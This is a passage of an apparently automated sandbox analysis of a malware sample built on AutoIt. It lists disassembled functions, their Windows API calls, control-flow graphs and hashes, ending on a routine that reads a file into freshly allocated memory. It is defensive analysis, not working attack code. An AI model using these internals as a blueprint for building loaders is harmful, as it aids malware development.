                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                    • API String ID: 4212290369-1082885916
                    • Opcode ID: 867be865ccffc012ce5c516809f373b0095b39098f657b5a4e6ab7579dc9738c
                    • Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
                    • Opcode Fuzzy Hash: 867be865ccffc012ce5c516809f373b0095b39098f657b5a4e6ab7579dc9738c
                    • Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A
                    Function 00B08550 Relevance: 21.5, APIs: 14, Instructions: 538COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorFreeLast
                    • String ID:
                    • API String ID: 1762890227-0
                    • Opcode ID: 2b4cfbf82587897175794da40316f1881624dc7b6bd09b2f26f04cc3983bbc0a
                    • Instruction ID: 6e1140565c54ce0ca2718fb79faf2203ef12f7076210689dba49f4739c9f3729
                    • Opcode Fuzzy Hash: 2b4cfbf82587897175794da40316f1881624dc7b6bd09b2f26f04cc3983bbc0a
                    • Instruction Fuzzy Hash: 00F14560D4D3819EDB3647288C09736AEE4EF72770F4C07DAE0D5960F2EE649F058226
                    Function 00469155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1129 469155-469205 call 431940 call 420db6 call 40522e call 468f5f call 404ee5 call 42354c 1142 46920b-469212 call 469734 1129->1142 1143 4692b8-4692bf call 469734 1129->1143 1148 4692c1-4692c3 1142->1148 1149 469218-4692b6 call 4240fb call 422dbc call 422d8d call 4240fb call 422d8d * 2 1142->1149 1143->1148 1150 4692c8 1143->1150 1152 46952a-46952b 1148->1152 1151 4692cb-469387 call 404f0b * 8 call 4698e3 call 42525b 1149->1151 1150->1151 1188 469390-4693ab call 468fa5 1151->1188 1189 469389-46938b 1151->1189 1156 469548-469558 call 405211 1152->1156 1192 4693b1-4693b9 1188->1192 1193 46943d-469449 call 4253a6 1188->1193 1189->1152 1194 4693c1 1192->1194 1195 4693bb-4693bf 1192->1195 1200 46945f-469463 1193->1200 1201 46944b-46945a DeleteFileW 1193->1201 1197 4693c6-4693e4 call 404f0b 1194->1197 1195->1197 1208 4693e6-4693eb 1197->1208 1209 46940e-469424 call 468953 call 424863 1197->1209 1203 469505-469519 CopyFileW 1200->1203 1204 469469-4694f2 call 4240bb call 4699ea call 468b06 1200->1204 1201->1152 1206 46952d-469543 DeleteFileW call 4698a2 1203->1206 1207 46951b-469528 DeleteFileW 1203->1207 1204->1206 1225 4694f4-469503 DeleteFileW 1204->1225 1206->1156 1207->1152 1210 4693ee-469401 call 4690dd 1208->1210 1222 469429-469434 1209->1222 1220 469403-46940c 1210->1220 1220->1209 1222->1192 1224 46943a 1222->1224 1224->1193 1225->1152
                    APIs
                      • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
                      • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                    • __wsplitpath.LIBCMT ref: 00469234
                      • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
                    • _wcscpy.LIBCMT ref: 00469247
                    • _wcscat.LIBCMT ref: 0046925A
                    • __wsplitpath.LIBCMT ref: 0046927F
                    • _wcscat.LIBCMT ref: 00469295
                    • _wcscat.LIBCMT ref: 004692A8
                      • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
                      • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
                    • _wcscmp.LIBCMT ref: 004691EF
                      • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                      • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
                    • _wcsncpy.LIBCMT ref: 004694C5
                    • DeleteFileW.KERNEL32(?,?), ref: 004694FB
                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                    • String ID:
                    • API String ID: 1500180987-0
                    • Opcode ID: 72f74135f6da1f003ebd9f44f595e8cd29ac2ed1f7a032e3997be759fd394df1
                    • Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
                    • Opcode Fuzzy Hash: 72f74135f6da1f003ebd9f44f595e8cd29ac2ed1f7a032e3997be759fd394df1
                    • Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69
                    Function 00403015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00403074
                    • RegisterClassExW.USER32(00000030), ref: 0040309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                    • LoadIconW.USER32(000000A9), ref: 004030F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                    • Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
                    • Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
                    • Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69
                    Function 00403041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00403074
                    • RegisterClassExW.USER32(00000030), ref: 0040309E
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                    • InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                    • LoadIconW.USER32(000000A9), ref: 004030F2
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                    • Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
                    • Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
                    • Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9
                    Function 0040708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1295 40708b-4071b0 call 431940 call 407667 call 404706 call 42050b call 407cab call 403f74 call 407667 call 407d8c RegOpenKeyExW 1312 43e8b1-43e8cc RegQueryValueExW 1295->1312 1313 4071b6-4071d3 call 405904 * 2 1295->1313 1315 43e943-43e94f RegCloseKey 1312->1315 1316 43e8ce-43e90d call 420db6 call 40522e RegQueryValueExW 1312->1316 1315->1313 1318 43e955-43e959 1315->1318 1329 43e92b-43e931 1316->1329 1330 43e90f-43e929 call 407bcc 1316->1330 1322 43e95e-43e984 call 4079f2 * 2 1318->1322 1335 43e986-43e994 call 4079f2 1322->1335 1336 43e9a9-43e9b6 call 422bfc 1322->1336 1333 43e933-43e940 call 420e2c * 2 1329->1333 1334 43e941 1329->1334 1330->1329 1333->1334 1334->1315 1335->1336 1345 43e996-43e9a7 call 422d8d 1335->1345 1347 43e9b8-43e9c9 call 422bfc 1336->1347 1348 43e9dc-43ea16 call 407de1 call 403f74 call 405904 call 4079f2 1336->1348 1357 43ea1c-43ea1d 1345->1357 1347->1348 1355 43e9cb-43e9db call 422d8d 1347->1355 1348->1313 1348->1357 1355->1348 1357->1322
                    APIs
                      • Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724
                      • Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D
                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                    • RegCloseKey.ADVAPI32(?), ref: 0043E947
                    • _wcscat.LIBCMT ref: 0043E9A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                    • API String ID: 2673923337-2727554177
                    • Opcode ID: 11a4a3c91bccf0a78efa524780f2de3e74fbfd1818abf5b9f609df4b82d2a059
                    • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                    • Opcode Fuzzy Hash: 11a4a3c91bccf0a78efa524780f2de3e74fbfd1818abf5b9f609df4b82d2a059
                    • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A
                    Function 00403633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1365 403633-403681 1367 4036e1-4036e3 1365->1367 1368 403683-403686 1365->1368 1367->1368 1369 4036e5 1367->1369 1370 4036e7 1368->1370 1371 403688-40368f 1368->1371 1372 4036ca-4036d2 DefWindowProcW 1369->1372 1373 4036ed-4036f0 1370->1373 1374 43d0cc-43d0fa call 411070 call 411093 1370->1374 1375 403695-40369a 1371->1375 1376 40374b-403753 PostQuitMessage 1371->1376 1380 4036d8-4036de 1372->1380 1381 4036f2-4036f3 1373->1381 1382 403715-40373c SetTimer RegisterWindowMessageW 1373->1382 1408 43d0ff-43d106 1374->1408 1377 4036a0-4036a2 1375->1377 1378 43d154-43d168 call 462527 1375->1378 1379 403711-403713 1376->1379 1385 403755-403764 call 4044a0 1377->1385 1386 4036a8-4036ad 1377->1386 1378->1379 1402 43d16e 1378->1402 1379->1380 1389 4036f9-40370c KillTimer call 40443a call 403114 1381->1389 1390 43d06f-43d072 1381->1390 1382->1379 1387 40373e-403749 CreatePopupMenu 1382->1387 1385->1379 1392 4036b3-4036b8 1386->1392 1393 43d139-43d140 1386->1393 1387->1379 1389->1379 1396 43d074-43d076 1390->1396 1397 43d0a8-43d0c7 MoveWindow 1390->1397 1400 43d124-43d134 call 462d36 1392->1400 1401 4036be-4036c4 1392->1401 1393->1372 1407 43d146-43d14f call 457c36 1393->1407 1404 43d097-43d0a3 SetFocus 1396->1404 1405 43d078-43d07b 1396->1405 1397->1379 1400->1379 1401->1372 1401->1408 1402->1372 1404->1379 1405->1401 1409 43d081-43d092 call 411070 1405->1409 1407->1372 1408->1372 1414 43d10c-43d11f call 40443a call 40434a 1408->1414 1409->1379 1414->1372
                    APIs
                    • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                    • KillTimer.USER32(?,00000001), ref: 004036FC
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                    • CreatePopupMenu.USER32 ref: 0040373E
                    • PostQuitMessage.USER32(00000000), ref: 0040374D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated$%I
                    • API String ID: 129472671-1195164674
                    • Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                    • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                    • Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                    • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E
                    Function 00403A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                    • LoadIconW.USER32(00000063), ref: 00403A76
                    • LoadIconW.USER32(000000A4), ref: 00403A88
                    • LoadIconW.USER32(000000A2), ref: 00403A9A
                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                    • RegisterClassExW.USER32(?), ref: 00403B16
                      • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                      • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                      • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                      • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                      • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                      • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                      • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: #$0$AutoIt v3
                    • API String ID: 423443420-4155596026
                    • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                    • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                    • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                    • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                    Function 00AECE90 Relevance: 16.2, APIs: 10, Instructions: 1203COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f3b2a67ba4737bf340ccd7156652abcca8b73e61870248da86ee233e4e9feb40
                    • Instruction ID: af0522e5d3063f6fdae7a48ed59c0aca245d97b28f83adb6a4b709605a6e755e
                    • Opcode Fuzzy Hash: f3b2a67ba4737bf340ccd7156652abcca8b73e61870248da86ee233e4e9feb40
                    • Instruction Fuzzy Hash: 6EA27A7190D3C08FC735CB1AC854BAABBE1AFD5328F094A5DE49897292D335AD05CB93
                    Function 00403766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                    • API String ID: 1825951767-3937808951
                    • Opcode ID: 1353912382c4c0e1f77a518e7e44a79a3158d89e17be8042cd3d853c7bd06722
                    • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                    • Opcode Fuzzy Hash: 1353912382c4c0e1f77a518e7e44a79a3158d89e17be8042cd3d853c7bd06722
                    • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9
                    Function 0040F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                      • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                    • OleInitialize.OLE32(00000000), ref: 0040FA4A
                    • CloseHandle.KERNEL32(00000000), ref: 004445C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                    • String ID: <WL$\TL$%I$SL
                    • API String ID: 1986988660-4199584472
                    • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                    • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                    • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                    • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D
                    Function 00C30040 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2031 c30040-c300ee call c2da50 2034 c300f5-c3011b call c30f50 CreateFileW 2031->2034 2037 c30122-c30132 2034->2037 2038 c3011d 2034->2038 2046 c30134 2037->2046 2047 c30139-c30153 VirtualAlloc 2037->2047 2039 c3026d-c30271 2038->2039 2040 c302b3-c302b6 2039->2040 2041 c30273-c30277 2039->2041 2043 c302b9-c302c0 2040->2043 2044 c30283-c30287 2041->2044 2045 c30279-c3027c 2041->2045 2050 c302c2-c302cd 2043->2050 2051 c30315-c3032a 2043->2051 2052 c30297-c3029b 2044->2052 2053 c30289-c30293 2044->2053 2045->2044 2046->2039 2048 c30155 2047->2048 2049 c3015a-c30171 ReadFile 2047->2049 2048->2039 2054 c30173 2049->2054 2055 c30178-c301b8 VirtualAlloc 2049->2055 2056 c302d1-c302dd 2050->2056 2057 c302cf 2050->2057 2058 c3033a-c30342 2051->2058 2059 c3032c-c30337 VirtualFree 2051->2059 2060 c302ab 2052->2060 2061 c3029d-c302a7 2052->2061 2053->2052 2054->2039 2062 c301ba 2055->2062 2063 c301bf-c301da call c311a0 2055->2063 2064 c302f1-c302fd 2056->2064 2065 c302df-c302ef 2056->2065 2057->2051 2059->2058 2060->2040 2061->2060 